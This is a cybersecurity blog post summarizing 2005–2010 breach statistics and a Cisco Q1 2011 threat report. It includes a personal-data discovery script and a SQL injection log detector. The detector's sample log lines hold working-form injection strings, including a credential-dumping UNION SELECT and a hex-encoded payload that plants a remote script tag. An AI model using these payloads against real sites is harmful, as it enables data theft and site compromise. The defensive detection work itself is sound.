Brian Pennington

A blog about Cyber Security & Compliance

Six Years of Data Breaches including the TOP 10 largest Breaches

The Leaking Vault 2011 report from the Digital Forensics Association gathered data from 3,765 publicly disclosed data breach incidents, making it the largest study of its kind to date. Information was gleaned from the organizations that track these events as well as from government sources. Breaches from 33 countries in addition to the United States were included.

The study covers incidents from 2005 through 2010 and includes over 806.2 million known records disclosed. On average, the affected organizations lost more than 388,000 records per day (over 15,000 records per hour), every day, across the six-year study period.

The estimated cost of these breaches comes to more than $156 billion for the organizations that experienced them. The figure excludes costs incurred by downstream or upstream organizations and by the data subject victims, and it is a low estimate because 35% of the incidents did not report a figure for records lost.

The hacking vector remains the leader in records lost, responsible for 48% of the records disclosed in the study.

  • In 65% of the cases, the data disclosed included the data subject’s name, address and Social Security Number (SSN)
  • 16% disclosed medical information
  • 15% of the incidents disclosed Credit Card Numbers

Medical disclosures increased significantly with the addition of the 2010 data. This is more likely a result of regulatory breach-reporting requirements taking effect than of any real increase in incidents. Incidents in which criminal use of the data was confirmed increased by 58% from the prior report.

Here is a small sampling of incidents from the study to put a personal face on the statistics:

  • Three servers (waitstaff) at a well-known restaurant chain were charged with using skimming devices to make more than $117,000 in fraudulent charges to customers’ credit card accounts.
  • A restaurant employee stole customer credit card information and used it to buy $200,000 of Walmart gift cards.
  • Over six months, nine employees of a telecommunications company inappropriately accessed confidential customer account information and used it to make cloned cell phones. Over $15 million of unauthorized phone calls resulted from the scheme.
  • An executive turned himself in to authorities after being accused of selling customer information to identity thieves in exchange for sports tickets and gift cards.
  • The owner of a medical equipment business used Medicare client information to obtain approximately $1.6 million in fraudulent claims.
  • The owner of a farm equipment store pled guilty to federal charges, admitting she stole customers’ identities to obtain more than 80 loans worth $1.7 million.

Breach Vectors

There has been a rise in snooping and other inappropriate disclosure, where the confidentiality of the data is breached but the data may not have left the organization’s control, or where the act was done with the organization’s approval but later found to be an inappropriate breach of confidentiality. In a recent case, UCLA Medical Center agreed to pay $865,000 to settle instances in which employees snooped on the medical records of celebrities being treated at the facility.

Another example: the California Department of Health Care Services released confidential and identifying information about HIV-positive Medi-Cal recipients to a third-party service provider, which was later deemed both illegal and unauthorized. To classify such cases, a new breach vector, Disclosure, has been added to the study beginning with 2011.

The Laptop Vector

Laptops increasingly hold significant amounts of organizational data. They are frequently the only computer an employee uses, and they ship with a hard drive that can hold very large datasets. It is not uncommon for a company to discover after a breach that the individual assigned the asset had spreadsheets, or even whole databases, of sensitive data on it. When a laptop is issued, it should come with a set of rules for the custodian of the device: direction for maintaining physical control offsite (e.g., never leave it in a vehicle) and onsite (e.g., lock it to the work surface), plus compensating controls for when those rules are insufficient or are not followed. Potential controls include full-disk encryption, remote wipe capability and tracking/recovery software. Note that disk encryption only helps if the disk is actually locked when the device is lost; a laptop left asleep with an unlocked session offers little protection. The organization has a responsibility to the data subjects to take appropriate steps to ensure their data is not at risk of disclosure when the unexpected happens.

Of the 3,765 incidents in the study, 719 involved laptops being improperly disposed of, getting stolen, or being lost. In 96% of these incidents, the laptops were stolen. Overall, the laptop vector accounted for 45,500,147 records in the study.

  • The largest number of laptops were stolen from the office of the organization suffering the loss, which illustrates the need to lock laptops down when unattended at work.
  • The second largest number were stolen from inside a vehicle. This is the most preventable category and represents 191 incidents and over 4 million records.

The Hacking Vector

The 2010 data increasingly showed the prevalence of skimmers: card readers, typically handheld or installed in ATMs and point-of-sale devices, that read and steal the card’s magnetic-stripe track data. They were most commonly seen in retail establishments, and especially in restaurants. Anywhere the card leaves the customer’s control, there is a higher risk that a dishonest employee will run it through a skimmer. That is not to say card data is safe while in the customer’s control: another increasingly common incident is the skimmer installed in a gas pump. There is either a skimmer on the outside of the pump (these are becoming very clever and hard to spot) or a device inside the pump, where the customer has no hope of detecting it, that the criminals can unload wirelessly with minimal risk of being caught.

The Large Incidents (Involving over 1 Million Records)

Only 66 of the 3,765 incidents involved over 1 million records, but those 2% of incidents accounted for 91% of the records disclosed over the study. The top vector for large incidents was Hack, claiming 29% of them; Drive/Media took 22% and Fraud-SE 17%.

Breach Vectors of the Ten Largest Incidents (2005 – 2010)

Organization                       Records      Vector
Heartland Payment Systems      130,000,000      Hack
TJX Companies                   94,000,000      Hack
Facebook                        80,000,000      Web
National Archives               76,000,000      Drive/Media
CardSystems                     40,000,000      Hack
RockYou, Inc.                   32,000,000      Hack
U.S. Dept. of Veterans Affairs  28,600,000      Laptop
H.M. Revenue and Customs        25,000,000      Drive/Media
iBill                           17,781,462      Fraud-SE
T-Mobile                        17,000,000      Drive/Media

Criminal Use

Criminal or malicious motivation makes for more expensive breaches, both for the organizations that suffer them and for the people whose data is compromised. Between 2005 and 2010, 396 cases were confirmed to involve data subsequently used for criminal activity. This is a difficult metric to track, since breached data is commonly sold and resold.

Crimes in which the perpetrator has a direct connection to the victim are the ones where an arrest is most often reported along with the incident. As a result, the Fraud-SE category is represented in the criminal-use figures by a much higher margin than some of the vectors that produced the large-scale disclosures.

Credit Cards

There were 558 incidents involving credit card number (CCN) data, accounting for almost 330 million records. The median number of records disclosed was 1,000, and 45% of the incidents did not list how many records were disclosed. These records fall under the Payment Card Industry Data Security Standard (PCI DSS), and the organizations that experienced these incidents will have to undergo further scrutiny to prove they are compliant with the standard.

The ID Theft Critical Data Elements

The identity theft critical data elements are those that, in combination with name and address, facilitate identity theft and financial fraud, namely the SSN and date of birth. In the first Leaking Vault report (TLV), we looked at incidents in which all three items were lost in the same event. At that time there were only 262 such incidents; there are now 1,084.

The report’s breakdown by sector shows a substantial increase in the Business sector, from 168 incidents in the prior study to 850. Yet in only 13% of these cases, where the combination of data puts the victim in the worst possible position, are the organizations confirmed to have offered credit monitoring. There are many unknowns here as well: in most cases the reports simply do not say whether the service was offered. This metric is gleaned primarily from the original breach notification letters, obtained either through FOIA requests or from government entities that post the original documents as part of the event report. In the Business sector, 38 cases are confirmed as definitely not offering the service; for the remaining 701, the credit monitoring status is not provided.
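As an added example (not code from the report or from this blog), the following Python script shows the data-at-rest discovery check that ties the laptop, credit card and identity theft sections together: it scans rows of a spreadsheet export for SSNs, dates of birth and Luhn-valid card numbers, flags rows that hold the critical name + address + SSN + date-of-birth combination, and flags rows whose card numbers put the file in PCI DSS scope. The sample rows, and the assumed name,address,ssn,dob,payment column layout, are constructed for illustration.

```python
import re
from typing import Dict, List

# Constructed sample rows in the assumed layout name,address,ssn,dob,payment
# (not data from the report). Row 1 is the worst case; rows 2 and 3 carry
# look-alike values that a naive digit-run scanner would report as hits.
SAMPLE_ROWS = [
    "Jane Doe,123 Main St,078-05-1120,1970-04-02,4111111111111111",
    "John Roe,9 Elm Ave,none,1985-11-30,order-20110315-000042",
    "Acme Corp,PO Box 7,12-3456789,n/a,4111111111111112",
]

# SSN: area not 000/666/9xx, group not 00, serial not 0000 (published SSN structure).
SSN_RE = re.compile(r"\b(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")
# Date of birth in ISO form; a real scanner would also accept locale formats.
DOB_RE = re.compile(r"\b(?:19|20)\d{2}-(?:0[1-9]|1[0-2])-(?:0[1-9]|[12]\d|3[01])\b")
# Candidate PAN: 13 to 19 digits with optional single space/hyphen separators.
PAN_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:  # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_pans(text: str) -> List[str]:
    """Digit runs that look like PANs and pass Luhn; order IDs and typos usually fail it."""
    pans = []
    for m in PAN_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if luhn_ok(digits):
            pans.append(digits)
    return pans


def classify(row: str) -> Dict[str, object]:
    """Report which sensitive elements one CSV row contains and what that implies."""
    fields = [f.strip() for f in row.split(",")]
    found: Dict[str, object] = {
        "name": bool(fields[0]),                         # assumed column layout
        "address": len(fields) > 1 and bool(fields[1]),  # assumed column layout
        "ssn": SSN_RE.search(row) is not None,
        "dob": DOB_RE.search(row) is not None,
        "pans": find_pans(row),
    }
    # The report's worst case: name, address, SSN and DOB lost together.
    found["id_theft_critical"] = all(found[k] for k in ("name", "address", "ssn", "dob"))
    # Any Luhn-valid PAN puts the file in PCI DSS scope.
    found["pci_scope"] = bool(found["pans"])
    return found


def scan(rows: List[str]) -> List[Dict[str, object]]:
    return [classify(r) for r in rows]


if __name__ == "__main__":
    for row, result in zip(SAMPLE_ROWS, scan(SAMPLE_ROWS)):
        print(row.split(",")[0], {k: v for k, v in result.items() if v})
```

Run against a real export, only the first row is reported as both identity-theft critical and in PCI scope: the order number in the second row and the mistyped card number in the third are rejected by the Luhn check, and the EIN in the third row does not match the SSN structure. That false-positive filtering is what makes such a scan usable on a laptop full of spreadsheets.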

Estimated Cost of Data Breaches/Year

Year   Records Disclosed   Cost Per Record   Total Cost
2005          68,555,563           $138.00   $9,460,667,694.00
2006          80,377,865           $182.00   $14,628,771,430.00
2007         164,813,878           $197.00   $32,468,333,966.00
2008         182,707,769           $202.00   $36,906,969,338.00
2009         261,759,494           $204.00   $53,398,936,776.00
2010          48,080,863          $204.00*   $9,808,496,052.00
Total        806,295,432                     $156,672,175,256.00
* 2010 uses the 2009 cost-per-record figure.

The full Leaking Vault 2011 report is available from the Digital Forensics Association.

Global Threat Report Quarter 1 2011

The Cisco Quarter 1 2011 Global Threat Report has been released. It compiles data collected across the four segments of Cisco Security: ScanSafe, IPS, RMS and IronPort.

The highlights for Quarter 1 2011 include:

  • 105,536 unique Web malware samples were encountered in March 2011, a 46% increase from January 2011
  • Malicious webmail represented 7% of all Web-delivered malware in March 2011, a 391% increase from January 2011
  • 45% of all malicious webmail resulted from Yahoo! mail, 25% from Microsoft Live/Hotmail, and only 2% from Google’s Gmail
  • Search-engine-related traffic resulted in an average of 9% of all Web malware encountered in 1Q11
  • 33% of search engine encounters were via Google search engine results pages (SERPs), with 4% each from Yahoo! and Bing SERPs
  • SERPs and webmail encounters are impacted by the popularity of a particular service and are likely not indicative of any heightened risk specific to that service
  • Likejacking increased significantly during the first quarter of 2011, from 0.54% of all Web malware encounters in January 2011 to 6% in March 2011
  • At 13%, Miley Cyrus–themed likejacking scams beat out all other celebrities and events in March 2011. Likejacking themes for Indian actress Nayantara were at 7%, while Charlie Sheen was at 3%, Justin Bieber at 2%, and Lady Gaga at 1%
  • At 4% of all Web malware encounters in 1Q11, website compromises that attempted to download the Hiloti Trojan were the most frequently encountered, followed by malicious GIF injections (3%). Website compromises related to the Lizamoon series of SQL injection attacks represented just 0.15% of Web malware encounters for the quarter
  • Though far less successful than in years past, SQL injection attempts continued to be the most prevalent event firing (55%) observed by Cisco Remote Management Services in 1Q11
  • Malware activity related to the MyDoom worm was the 10th most frequently RMS-observed IPS event in 1Q11, demonstrating that legacy malware can still pose a threat to unprotected systems
  • As expected, Rustock activity declined significantly over 1Q11, but, interestingly, the sharp decline commenced weeks prior to the botnet takedown
  • Following 4Q10 declines, global spam volume increased and then subsequently decreased during 1Q11, but levels remained above that of December 2010
  • With an increase of 248%, Indonesia overtook the United States as the top spam-sending country in 1Q11
Cisco’s Top 10 Signature Findings, Q1 2011

Signature                                                                  Share
Generic SQL Injection                                                     55.03%
Web View Script Injection Vulnerability                                    7.01%
Gbot Command and Control Over HTTP                                         5.16%
B02K-UDP                                                                   5.20%
Cisco Unified Videoconferencing Remote Command Injection                   4.91%
Microsoft Internet Explorer Invalid Flag Reference Remote Code Execution   3.27%
Windows MHTML Protocol Handler Script Execution                            2.47%
WWW WinNT cmd.exe Access                                                   1.30%
Web Application Security Test/Attack                                       1.19%
MyDoom Virus Activity                                                      1.16%

Note that the MHTML vulnerability described in Microsoft KB 2501696, IntelliShield alert 22310, and Cisco Intrusion Prevention System (IPS) 6.0 – 33379/0 also appears on the Cisco RMS top 10 signature events list for 1Q11. Microsoft released an update for this former zero-day vulnerability in April 2011 (MS11-026).

Although SQL injection was a frequent event in 1Q11, attempts remained at a fairly steady pace throughout the quarter, with the only notable increase occurring in the latter part of March 2011.
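As an added example, not taken from the Cisco report, here is a small Python detector of the kind that sits behind a "Generic SQL Injection" event. It parses constructed Apache-style access log lines, URL-decodes each query string repeatedly (so double encoding does not hide a quote), matches a handful of injection signatures, and decodes hex literals so that a Lizamoon-style CAST(0x... AS VARCHAR) payload is inspected for the script tag it injects. The log lines, IP addresses, hostnames and signature set are constructed for illustration and are far smaller than a real IPS rule set.

```python
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Constructed inner payload, hex-encoded the way Lizamoon-style injections carried it.
INNER_SQL = "UPDATE pages SET body=body+'<script src=//example.invalid/ur.js></script>'"
INNER_HEX = INNER_SQL.encode("ascii").hex()

# Constructed Apache combined-format log lines (RFC 5737 documentation addresses).
LOG_LINES = [
    '203.0.113.7 - - [22/Mar/2011:10:14:02 +0000] "GET /products.asp?id=3 HTTP/1.1" 200 4312 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [22/Mar/2011:10:14:05 +0000] "GET /products.asp?id=3%27%20or%201%3D1-- HTTP/1.1" 200 9120 "-" "Mozilla/4.0"',
    f'198.51.100.9 - - [22/Mar/2011:10:15:11 +0000] "GET /news.asp?cat=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x{INNER_HEX}%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1" 500 0 "-" "-"',
    '198.51.100.9 - - [22/Mar/2011:10:16:40 +0000] "GET /search.asp?q=1%20UNION%20SELECT%20username,password%20FROM%20users HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.44 - - [22/Mar/2011:10:17:00 +0000] "GET /index.asp HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

REQ_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Deliberately small signature set; a production IPS carries hundreds of these.
SIGNATURES = {
    "tautology": re.compile(r"'\s*or\s+\S+\s*=\s*\S+", re.I),
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "mssql_declare_exec": re.compile(r"\bdeclare\s+@\w+\b.*\bexec(?:ute)?\s*\(", re.I | re.S),
    "hex_cast": re.compile(r"\bcast\s*\(\s*0x[0-9a-f]+\s+as\b", re.I),
    "script_tag": re.compile(r"<script\b", re.I),
    "comment_terminator": re.compile(r"(?:--|/\*)\s*$"),
}
HEX_LITERAL_RE = re.compile(r"0x([0-9a-fA-F]{2,})")


def fully_decode(s: str, max_rounds: int = 3) -> str:
    """URL-decode until stable so %2527-style double encoding does not hide a quote."""
    for _ in range(max_rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def decode_hex_literals(s: str) -> List[str]:
    """Turn 0x... literals back into text so the smuggled SQL can be matched."""
    out = []
    for m in HEX_LITERAL_RE.finditer(s):
        h = m.group(1)
        if len(h) % 2:
            continue
        try:
            out.append(bytes.fromhex(h).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            pass
    return out


def analyze(line: str) -> Optional[Dict[str, object]]:
    """Return the decoded query, matched signatures and any hex payloads for one log line."""
    m = REQ_RE.match(line)
    if not m:
        return None
    query = m.group("path").partition("?")[2]
    decoded = fully_decode(query)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    payloads = decode_hex_literals(decoded)
    for payload in payloads:  # re-run the signatures on what the hex literal hides
        hits.extend(f"hex:{name}" for name, rx in SIGNATURES.items() if rx.search(payload))
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "decoded_query": decoded,
        "hits": hits,
        "hex_payloads": payloads,
    }


def summarize(lines: List[str]):
    """Count signature firings and the source IPs behind them, as an IPS top-N view would."""
    by_signature: Counter = Counter()
    by_ip: Counter = Counter()
    for line in lines:
        result = analyze(line)
        if result and result["hits"]:
            by_signature.update(result["hits"])
            by_ip[result["ip"]] += 1
    return by_signature, by_ip


if __name__ == "__main__":
    for line in LOG_LINES:
        r = analyze(line)
        print(r["ip"], r["status"], r["hits"], r["hex_payloads"])
    print(summarize(LOG_LINES))
```

The hex decoding step is the part worth copying: the outer request already trips the DECLARE/EXEC and CAST signatures, but only after decoding the literal does the detector see the injected script tag, which is the stored payload that turned the compromised sites in the Lizamoon series into malware distribution points.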

Cisco RMS Top 10 by Port Activity

Port    Share    Typical service
80      69%      HTTP
40436   2.23%    (unassigned high port)
25      2.17%    SMTP
161     1.39%    SNMP
5060    1.27%    SIP
123     1.16%    NTP
34227   1.13%    (unassigned high port)
443     1.05%    HTTPS
21      1.00%    FTP control
20      0.71%    FTP data

Although they represent a relatively small percentage of overall spam, phishing attacks pose a serious risk to security, both from a financial and sensitive information disclosure perspective. In 1Q11, attackers increasingly turned their attention toward phishing Twitter accounts.

This interest in Twitter credentials is likely due in part to Twitter users’ acceptance of shortened URLs. By compromising Twitter accounts, attackers can take advantage of shortened URLs to entice followers to visit malicious links the users might ordinarily view as suspicious. Such attacks are further fuelled by the trust engendered through social networking in general.

The report can be downloaded here
